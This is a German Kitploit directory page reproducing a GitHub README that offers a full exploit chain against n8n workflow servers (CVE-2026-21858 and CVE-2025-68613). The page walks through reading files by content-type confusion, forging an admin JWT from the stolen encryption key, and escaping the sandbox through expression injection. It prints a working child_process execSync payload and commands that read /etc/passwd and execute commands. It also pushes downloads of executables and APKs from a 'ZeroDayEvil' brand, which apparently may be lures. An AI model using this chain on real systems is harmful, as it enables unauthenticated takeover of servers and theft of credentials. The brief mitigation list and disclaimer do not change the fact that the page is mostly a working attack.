Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-21858-n8n-FullChain — 🛡️ Offizielles KI-Sicherheitstool-Modul für CVE-2026-21858 + CVE-2025-68613 (n8n „Ni8mare" nicht authentifizierte beliebige Dateilese- & Expression-Injection-RCE-Vollkette). | Kitploit
Tools/GitHubGitHub/zerodayevil/cve-2026-21858-n8n-fullchain
SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationWebsicherheitPenetrationstestsRed TeamingPayload-Entwicklung
KI-Sicherheit
GitHubzerodayevil/cve-2026-21858-n8n-fullchain

CVE-2026-21858-n8n-FullChain

🛡️ Offizielles KI-Sicherheitstool-Modul für CVE-2026-21858 + CVE-2025-68613 (n8n „Ni8mare" nicht authentifizierte beliebige Dateilese- & Expression-Injection-RCE-Vollkette).

Repository anzeigen
vor 14h 12mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️ KI-Sicherheitswerkzeug-Modul
n8n Full Chain (CVE-2026-21858 + CVE-2025-68613) — "Ni8mare"

Offizielles Sicherheitsaudit-Modul für das KI-Sicherheitswerkzeug-Ökosystem


Latest Release Build Status Donations Telegram Channel

License

🌐 Web-Demo • 📚 Projekt-Website • 💬 Community-Chat

Website-Navigation: Startseite • Updates • Downloads • Module

AI Security Tool Banner


🧠 Konzeptioneller Überblick

Dieses Modul bietet Diagnosewerkzeuge und eine vollständige Exploit-Kette für n8n-Workflow-Automatisierungsinstanzen, genannt Ni8mare.

Die Angriffskette kombiniert ein unauthentifiziertes beliebiges Dateilesen (CVE-2026-21858), verursacht durch Content-Type-Verwechslung, mit einem authentifizierten Expression-Injection-Sandbox-Bypass (CVE-2025-68613). Durch Senden einer manipulierten Content-Type: application/json-Anfrage an ein exponiertes Datei-Upload-Formular kontrolliert ein Angreifer das filepath-Argument, um interne Systemdateien zu lesen (/proc/self/environ, Konfiguration und SQLite-DB). Der erlangte encryptionKey und der Passwort-Hash ermöglichen die Offline-Fälschung eines Administrator-JWT-Cookies. Nach der Authentifizierung entkommt die Expression-Injection über this.process.mainModule.require der JavaScript-Sandbox, um beliebige Systembefehle auszuführen.

🎯 Kernphilosophie der Auswirkung

"Vom Dateilesen zur vollständigen Systemübernahme in drei Schritten."
Während das Dateilesen einen aktiven Formular-Workflow mit binärer Ausgabe erfordert, funktioniert die Expression-Injection zuverlässig auf Standard-n8n-Installationen, ohne dass spezielle Nodes oder explizit aktivierte Systemberechtigungen erforderlich sind.

📊 Schwachstellen-Spezifikationen

SpezifikationZugewiesener WertAnmerkungen
CVE-IdentifikatorenCVE-2026-21858 + CVE-2025-68613Vollständige Kette: Unauthentifiziertes Dateilesen bis RCE
SchweregradKritisch (CVSS v3.1: 10.0 + 9.9)Unauthentifizierte RCE-Kette
SchwachstellentypenCWE-200 / CWE-94Content-Type-Verwechslung / Code-Injection
Betroffene Komponenten8n Workflow Automation EngineVersionen <= 1.65.0 (AFR) / >= 0.211.0 (RCE)
Gepatchte Versionen1.121.0 (AFR) / 1.120.4+ (RCE)Offizielle Hersteller-Patches veröffentlicht
Erforderliche BerechtigungenKeineUnauthentifizierter Erstzugriff über öffentliches Formular

🕸 Angriffsszenario & Architektur

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
    B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
    C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
    D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
    E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
    F -->|6. Execute Command| G[Full Remote Code Execution]

💻 Expression-Injection-Payload

root@kitploit:~
={{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require("child_process").execSync;
  return execSync("id").toString();
})() }}

🛡 Checkliste zur Risikominderung

  • 🟢 Sofort aktualisieren: Aktualisieren Sie n8n-Instanzen auf Version 1.121.0 oder höher.
  • 🟢 Workflow-Trigger einschränken: Deaktivieren Sie öffentliche unauthentifizierte Formular-Workflows oder erzwingen Sie eine strikte Dateivalidierung.
  • 🟡 Ausführungsbeschränkungen konfigurieren: Setzen Sie N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true und beschränken Sie Prozessfähigkeiten in Docker-Containern.

💻 So führen Sie dieses Modul aus

⚠️ WICHTIG: Dieses Modul wurde speziell für die sichere Ausführung und Diagnose innerhalb des KI-Sicherheitswerkzeug-Ökosystems entwickelt. Verwenden Sie stets verifizierte Module aus offiziellen Repositorys.

1️⃣ KI-Sicherheitswerkzeug installieren

Um die Überwachungs- und Diagnoseskripte auszuführen, stellen Sie sicher, dass die Kern-Engine des KI-Sicherheitswerkzeugs installiert ist:

Betriebssystem / PlattformVersionArchitektur / FormatVeröffentlichungsdatumStatusDownload-Link
🪟 Windowsv6.3.20x64 Installer (.exe)2026-09-08🟢 Neueste.exe herunterladen
🪟 Windowsv6.3.20x64 Portable (.tar.gz)2026-09-08🟢 Neueste.tar.gz herunterladen
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 Stabil.dmg herunterladen
🐧 Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01🟢 Stabil.tar.gz herunterladen
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 Stabil.apk herunterladen

2️⃣ Konsolenausführung

root@kitploit:~
# Read arbitrary file via diagnostic module
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

Execute full attack chain with custom command

uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"


🔍 Sicherheitsaudit-Module & PoC-Repositorys

Schwachstellen-Scanner-Module, PoC-Skripte und Forschungs-Repositorys, die von unserer Community gepflegt werden:

🔥 Remote Code Execution (RCE) & Netzwerk-Schwachstellen 5 Module
  • CVE-2026-21858 — n8n Full Chain Unauthenticated RCE (Ni8mare) @ZeroDayEvil
  • CVE-2026-41089 — Netlogon Remote Code Execution Exploit @ZeroDayEvil
  • CVE-2026-20805 — Windows Remote Code Execution Proof-of-Concept @ZeroDayEvil
  • CVE-2026-41096 — Kritisches RCE-Schwachstellen-Scanner-Modul @ZeroDayEvil
  • CVE-2026-24291 — Netzwerkprotokoll Remote Code Execution @ZeroDayVPN
🛡️ Privilegieneskalation (EoP) & Dienste 3 Module
  • CVE-2026-54121 — AD CS Certighost Domain Controller Impersonation @ZeroDayEvil
  • CVE-2026-66804 — CrossDevice Service Elevation of Privilege @ZeroDayVPN
  • CVE-2026-50416 — Lokale Privilegieneskalation Writeup & PoC @ZeroDayEvil
📚 Schwachstellenforschung & Writeups 2 Module
  • CVE-2026-42978 — Tiefgehende technische Analyse & PoC-Forschung @ZeroDayEvil
  • CVE-2026-83991 — Vollständiges WriteUp & Exploit-Demonstration @ZeroDayVPN

⚖️ Lizenz & Rechtlicher Haftungsausschluss

🚨 Haftungsausschluss

Dieses Werkzeug und die technische Analyse werden ausschließlich für autorisierte Systemaudits, Forschung und Penetrationstests bereitgestellt.
Die Ausführung von Exploit-Ketten gegen nicht autorisierte Ziele ist illegal. Die Autoren übernehmen keine Verantwortung für unbefugten Zugriff, Datenverlust oder Systemstörungen. Handeln Sie ausschließlich im Rahmen eines autorisierten Umfangs.

🔄 Beiträge & Community

Wir begrüßen Beiträge aus der Sicherheitsforschungs-Community! Hauptbereiche für Beiträge:

  1. KI-Integrationen: Hinzufügen neuer LLM-Anbieter und Entwicklung spezialisierter Sicherheitsagenten.
  2. Sicherheitswerkzeuge: Entwicklung von Schwachstellenmodulen und Integration von CLI-Scannern.
  3. Optimierung: Verbesserung der Parser-Geschwindigkeit, Ausführungssicherheit und Caching-Logik.
  4. Dokumentation: Verfassen von Forschungsarbeiten, Leitfäden und lokalisierten Übersetzungen.

🔗 Kontakt & Support

  • Offizielle Website: ZeroDayEvil.com
  • Ursprüngliche Forschung: Cyera Ni8mare Write-up
  • Telegram-Administrator: @ZeroDayEvil
  • Telegram-Chat: @ZeroDyaTool_chat
  • Telegram-Kanal: @ZeroDyaTool_channel
  • Projekt unterstützen: PayPal-Spenden
  • Open Collective: opencollective.com/ZeroDayEvil

KI-Sicherheitswerkzeug — Terminal-Workflow und Automatisierung für Cybersicherheitsexperten neu gedacht.

Tool herunterladen